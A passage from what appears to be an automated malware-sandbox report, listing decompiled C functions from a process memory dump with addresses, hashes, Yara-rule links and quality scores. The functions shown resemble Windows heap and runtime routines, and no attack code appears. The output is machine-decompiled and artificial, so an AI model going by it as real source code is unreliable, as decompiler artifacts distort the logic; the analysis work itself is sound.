							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E030D8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                                                                                                                    0x030d8a0a
                                                                                                                                                    0x030d8a1c
                                                                                                                                                    0x030d8a23
                                                                                                                                                    0x030d8a2e
                                                                                                                                                    0x030d8a30
                                                                                                                                                    0x030d8a36
                                                                                                                                                    0x030d8a3c
                                                                                                                                                    0x030d8a3e
                                                                                                                                                    0x030d8a4a
                                                                                                                                                    0x030d8a52
                                                                                                                                                    0x030d8a9c
                                                                                                                                                    0x030d8aae
                                                                                                                                                    0x030d8a58
                                                                                                                                                    0x030d8a5e
                                                                                                                                                    0x030d8a6a
                                                                                                                                                    0x030d8a6f
                                                                                                                                                    0x030d8a75
                                                                                                                                                    0x030d8a7d
                                                                                                                                                    0x030d8a85
                                                                                                                                                    0x030d8a86
                                                                                                                                                    0x030d8a89
                                                                                                                                                    0x030d8a93
                                                                                                                                                    0x030d8a99
                                                                                                                                                    0x030d8a9b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d8aaf
                                                                                                                                                    0x030d8abe
                                                                                                                                                    0x030d8ac3
                                                                                                                                                    0x030d8acb
                                                                                                                                                    0x030d8ad7
                                                                                                                                                    0x030d8ae0
                                                                                                                                                    0x030d8af1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d8af1
                                                                                                                                                    0x030d8acd
                                                                                                                                                    0x030d8ad5
                                                                                                                                                    0x030d8afb
                                                                                                                                                    0x030d8afd
                                                                                                                                                    0x030d8aff
                                                                                                                                                    0x030d8b07
                                                                                                                                                    0x030d8b22
                                                                                                                                                    0x030d8b24
                                                                                                                                                    0x030d8b2a
                                                                                                                                                    0x030d8b2e
                                                                                                                                                    0x030d8b3f
                                                                                                                                                    0x030d8b78
                                                                                                                                                    0x030d8b41
                                                                                                                                                    0x030d8b52
                                                                                                                                                    0x030d8b54
                                                                                                                                                    0x030d8b5c
                                                                                                                                                    0x030d8b74
                                                                                                                                                    0x030d8b74
                                                                                                                                                    0x030d8b5c
                                                                                                                                                    0x030d8b3f
                                                                                                                                                    0x030d8b5e
                                                                                                                                                    0x030d8b61
                                                                                                                                                    0x030d8b64
                                                                                                                                                    0x030d8b64
                                                                                                                                                    0x030d8b6c
                                                                                                                                                    0x030d8b6c
                                                                                                                                                    0x030d8b11
                                                                                                                                                    0x03129cd5
                                                                                                                                                    0x03129cd5
                                                                                                                                                    0x030d8b17
                                                                                                                                                    0x030d8b1a
                                                                                                                                                    0x030d8b1a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d8ad5
                                                                                                                                                    0x030d8a89

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 167ead20a7c4b3571961f05207f817f41f7efd5162dfff0599ee0e07c3383b01
                                                                                                                                                    • Instruction ID: 88282fbb1da6e20cb073622adb6c1c8b98738dbba3a70240af64feae09ed4fac
                                                                                                                                                    • Opcode Fuzzy Hash: 167ead20a7c4b3571961f05207f817f41f7efd5162dfff0599ee0e07c3383b01
                                                                                                                                                    • Instruction Fuzzy Hash: 634173B4A0232C9BDB64DF59CC88AE9B7F8FB84310F1485E9D91997251E7709E80CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0318AA16, Relevance: .1, Instructions: 120COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0318AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0318ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0318AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0318AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0316CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L030E77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E030E7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0318131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0316CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                                                                                                                                    0x0318aa1f
                                                                                                                                                    0x0318aa21
                                                                                                                                                    0x0318aa23
                                                                                                                                                    0x0318aa2b
                                                                                                                                                    0x0318aa30
                                                                                                                                                    0x0318aa36
                                                                                                                                                    0x0318aa39
                                                                                                                                                    0x0318aa42
                                                                                                                                                    0x0318aa75
                                                                                                                                                    0x0318aa7a
                                                                                                                                                    0x0318aa7c
                                                                                                                                                    0x0318aa7c
                                                                                                                                                    0x0318aa88
                                                                                                                                                    0x0318aa8a
                                                                                                                                                    0x0318aa8f
                                                                                                                                                    0x0318ab02
                                                                                                                                                    0x0318ab04
                                                                                                                                                    0x0318aa99
                                                                                                                                                    0x0318aaa8
                                                                                                                                                    0x0318aaaf
                                                                                                                                                    0x0318aab3
                                                                                                                                                    0x0318aacc
                                                                                                                                                    0x0318aad1
                                                                                                                                                    0x0318aad6
                                                                                                                                                    0x0318aae0
                                                                                                                                                    0x0318aaf3
                                                                                                                                                    0x0318aaf9
                                                                                                                                                    0x0318aafe
                                                                                                                                                    0x0318aafe
                                                                                                                                                    0x0318aaf3
                                                                                                                                                    0x0318aad6
                                                                                                                                                    0x0318aab3
                                                                                                                                                    0x0318ab07
                                                                                                                                                    0x0318ab0a
                                                                                                                                                    0x0318ab11
                                                                                                                                                    0x0318ab23
                                                                                                                                                    0x0318ab13
                                                                                                                                                    0x0318ab1c
                                                                                                                                                    0x0318ab1c
                                                                                                                                                    0x0318ab2b
                                                                                                                                                    0x0318ab44
                                                                                                                                                    0x0318ab44
                                                                                                                                                    0x0318ab51
                                                                                                                                                    0x0318ab51
                                                                                                                                                    0x0318aa44
                                                                                                                                                    0x0318aa47
                                                                                                                                                    0x0318aa4c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318aa5a
                                                                                                                                                    0x0318aa64
                                                                                                                                                    0x0318aa72
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318aa66
                                                                                                                                                    0x0318aa66
                                                                                                                                                    0x0318aa68
                                                                                                                                                    0x0318aa6a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318aa6a

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                                                                                    • Instruction ID: 09549a1d778e490f653e9b2677bd263887bc796a6f4678aea444edfef7609d8d
                                                                                                                                                    • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                                                                                    • Instruction Fuzzy Hash: 6D310436F106446BDB15EB69C845BAFFBBAEF88210F09406AE805AB251DB74CD40CA94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0318FDE2, Relevance: .1, Instructions: 116COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                    			E0318FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0318FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E03190A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E030E7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E03181608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E03192B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0318C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0318DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E030E7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0318A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                                                                                                                    0x0318fde7
                                                                                                                                                    0x0318fde8
                                                                                                                                                    0x0318fdec
                                                                                                                                                    0x0318fdee
                                                                                                                                                    0x0318fdf5
                                                                                                                                                    0x0318fdf7
                                                                                                                                                    0x0318fdfc
                                                                                                                                                    0x0318fe19
                                                                                                                                                    0x0318fe22
                                                                                                                                                    0x0318fe26
                                                                                                                                                    0x0318fec6
                                                                                                                                                    0x0318fecd
                                                                                                                                                    0x0318fed5
                                                                                                                                                    0x0318fee7
                                                                                                                                                    0x0318fed7
                                                                                                                                                    0x0318fee0
                                                                                                                                                    0x0318fee0
                                                                                                                                                    0x0318feef
                                                                                                                                                    0x0318ff00
                                                                                                                                                    0x0318ff02
                                                                                                                                                    0x0318ff07
                                                                                                                                                    0x0318ff07
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318feef
                                                                                                                                                    0x0318fe33
                                                                                                                                                    0x0318fe55
                                                                                                                                                    0x0318fe59
                                                                                                                                                    0x0318fe5b
                                                                                                                                                    0x0318fe5e
                                                                                                                                                    0x0318fe69
                                                                                                                                                    0x0318fe6d
                                                                                                                                                    0x0318fe6d
                                                                                                                                                    0x0318fe69
                                                                                                                                                    0x0318fe35
                                                                                                                                                    0x0318fe41
                                                                                                                                                    0x0318fe41
                                                                                                                                                    0x0318fe79
                                                                                                                                                    0x0318fe8b
                                                                                                                                                    0x0318fe7b
                                                                                                                                                    0x0318fe84
                                                                                                                                                    0x0318fe84
                                                                                                                                                    0x0318fe93
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318fea8
                                                                                                                                                    0x0318feba
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318feba
                                                                                                                                                    0x0318fdfe
                                                                                                                                                    0x0318fe01
                                                                                                                                                    0x0318fe02
                                                                                                                                                    0x0318fe08
                                                                                                                                                    0x0318ff0c
                                                                                                                                                    0x0318ff14
                                                                                                                                                    0x0318ff14

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                                                                    • Instruction ID: 4405854d73658d5a1eadbe7f3ddc760c5fcab5c56280976b06dc8f6ade5fc2f2
                                                                                                                                                    • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                                                                    • Instruction Fuzzy Hash: D1310336300644AFD726EB68D844F6ABBE9EFC9640F194459E446CB341DB74D852CB28
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0318EA55, Relevance: .1, Instructions: 111COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                    			E0318EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E030E2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0318E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E030CF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E030DFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0318AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0318BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E030E7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0317FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E030DFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0318A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                                                                                                                    0x0318ea55
                                                                                                                                                    0x0318ea66
                                                                                                                                                    0x0318ea68
                                                                                                                                                    0x0318ea6c
                                                                                                                                                    0x0318ea6f
                                                                                                                                                    0x0318ea72
                                                                                                                                                    0x0318ea75
                                                                                                                                                    0x0318ea7a
                                                                                                                                                    0x0318ea7a
                                                                                                                                                    0x0318ea7e
                                                                                                                                                    0x0318ea80
                                                                                                                                                    0x0318ea85
                                                                                                                                                    0x0318ea8b
                                                                                                                                                    0x0318eab5
                                                                                                                                                    0x0318eabc
                                                                                                                                                    0x0318eabf
                                                                                                                                                    0x0318eabf
                                                                                                                                                    0x0318eaca
                                                                                                                                                    0x0318eace
                                                                                                                                                    0x0318ead0
                                                                                                                                                    0x0318eae4
                                                                                                                                                    0x0318eaeb
                                                                                                                                                    0x0318eaf0
                                                                                                                                                    0x0318eaf5
                                                                                                                                                    0x0318eb09
                                                                                                                                                    0x0318eb0d
                                                                                                                                                    0x0318eb1d
                                                                                                                                                    0x0318eb2d
                                                                                                                                                    0x0318eb38
                                                                                                                                                    0x0318eb3d
                                                                                                                                                    0x0318eb41
                                                                                                                                                    0x0318eb4a
                                                                                                                                                    0x0318eb60
                                                                                                                                                    0x0318eb4c
                                                                                                                                                    0x0318eb52
                                                                                                                                                    0x0318eb59
                                                                                                                                                    0x0318eb59
                                                                                                                                                    0x0318eb68
                                                                                                                                                    0x0318eb71
                                                                                                                                                    0x0318eb71
                                                                                                                                                    0x0318ea8d
                                                                                                                                                    0x0318ea8f
                                                                                                                                                    0x0318ea92
                                                                                                                                                    0x0318ea97
                                                                                                                                                    0x0318ea97
                                                                                                                                                    0x0318ea9b
                                                                                                                                                    0x0318ea9c
                                                                                                                                                    0x0318ea9e
                                                                                                                                                    0x0318eaa6
                                                                                                                                                    0x0318eaa6
                                                                                                                                                    0x0318eb7e

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                                                                    • Instruction ID: cce251af1472168ebe7fd7800f2084f044c36ca243d9cd596d2a6e281936e028
                                                                                                                                                    • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                                                                    • Instruction Fuzzy Hash: 3A31B4766057059BC719EF28CC80AABB7A9FFC9610F08892DF5568B640DF30E805CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 031469A6, Relevance: .1, Instructions: 108COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 69%
                                                                                                                                                    			E031469A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x31bd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L030D6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E03146BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E03109980() >= 0) {
							E030E2280(_t56, 0x31b8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x31b8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x31b8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E030CB6F0(0x30ac338, 0x30ac288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E03109520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E031095D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E030DFFB0(_t68, _t77, 0x31b8778);
				}
				_pop(_t78);
				return E0310B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                                                                                                                    0x031469b5
                                                                                                                                                    0x031469be
                                                                                                                                                    0x031469c3
                                                                                                                                                    0x031469c9
                                                                                                                                                    0x031469cc
                                                                                                                                                    0x031469d1
                                                                                                                                                    0x031469d3
                                                                                                                                                    0x031469de
                                                                                                                                                    0x031469e1
                                                                                                                                                    0x031469ea
                                                                                                                                                    0x031469f6
                                                                                                                                                    0x031469fe
                                                                                                                                                    0x03146a13
                                                                                                                                                    0x03146a14
                                                                                                                                                    0x03146a15
                                                                                                                                                    0x03146a16
                                                                                                                                                    0x03146a1e
                                                                                                                                                    0x03146a26
                                                                                                                                                    0x03146a31
                                                                                                                                                    0x03146a36
                                                                                                                                                    0x03146a37
                                                                                                                                                    0x03146a40
                                                                                                                                                    0x03146a49
                                                                                                                                                    0x03146a4a
                                                                                                                                                    0x03146a53
                                                                                                                                                    0x03146a59
                                                                                                                                                    0x03146a5d
                                                                                                                                                    0x03146a5e
                                                                                                                                                    0x03146a64
                                                                                                                                                    0x03146a67
                                                                                                                                                    0x03146a6a
                                                                                                                                                    0x03146a6d
                                                                                                                                                    0x03146a70
                                                                                                                                                    0x03146a77
                                                                                                                                                    0x03146a7d
                                                                                                                                                    0x03146a86
                                                                                                                                                    0x03146a89
                                                                                                                                                    0x03146a9c
                                                                                                                                                    0x03146a9f
                                                                                                                                                    0x03146aa2
                                                                                                                                                    0x03146aa5
                                                                                                                                                    0x03146aaf
                                                                                                                                                    0x03146ab1
                                                                                                                                                    0x03146ab8
                                                                                                                                                    0x03146ab9
                                                                                                                                                    0x03146abb
                                                                                                                                                    0x03146abe
                                                                                                                                                    0x03146ac5
                                                                                                                                                    0x03146ac5
                                                                                                                                                    0x03146aaf
                                                                                                                                                    0x03146a40
                                                                                                                                                    0x03146a26
                                                                                                                                                    0x031469fe
                                                                                                                                                    0x03146ace
                                                                                                                                                    0x03146ad0
                                                                                                                                                    0x03146ad3
                                                                                                                                                    0x03146ad8
                                                                                                                                                    0x03146adf
                                                                                                                                                    0x03146adf
                                                                                                                                                    0x03146ae8
                                                                                                                                                    0x03146aef
                                                                                                                                                    0x03146aef
                                                                                                                                                    0x03146af9
                                                                                                                                                    0x03146b06

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5629fcb7c05132f67d91f83c43179a0b2ecb1a1578a3a50a983f840b9f8f0da8
                                                                                                                                                    • Instruction ID: 522f3f2ce9a277aa5014b061e7128e6ecf47661bcf5187444d64f10805bd217f
                                                                                                                                                    • Opcode Fuzzy Hash: 5629fcb7c05132f67d91f83c43179a0b2ecb1a1578a3a50a983f840b9f8f0da8
                                                                                                                                                    • Instruction Fuzzy Hash: D1417AB5E01708AFDB14DFA5D840BFEBBF8EF49718F18812AE814AB251DB709905CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030C5210, Relevance: .1, Instructions: 107COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                    			E030C5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E030C52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E031095D0();
							L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E030DEB70(_t54, 0x31b79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E031095D0();
								L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E030DEB70(_t54, 0x31b79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0310F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E030DEB70(_t54, 0x31b79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E031095D0();
							L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                                                                                                                    0x030c5220
                                                                                                                                                    0x030c5224
                                                                                                                                                    0x03120d13
                                                                                                                                                    0x03120d16
                                                                                                                                                    0x03120d19
                                                                                                                                                    0x030c522a
                                                                                                                                                    0x030c522a
                                                                                                                                                    0x030c522d
                                                                                                                                                    0x030c522d
                                                                                                                                                    0x030c5231
                                                                                                                                                    0x030c5235
                                                                                                                                                    0x030c5239
                                                                                                                                                    0x03120d5c
                                                                                                                                                    0x03120d62
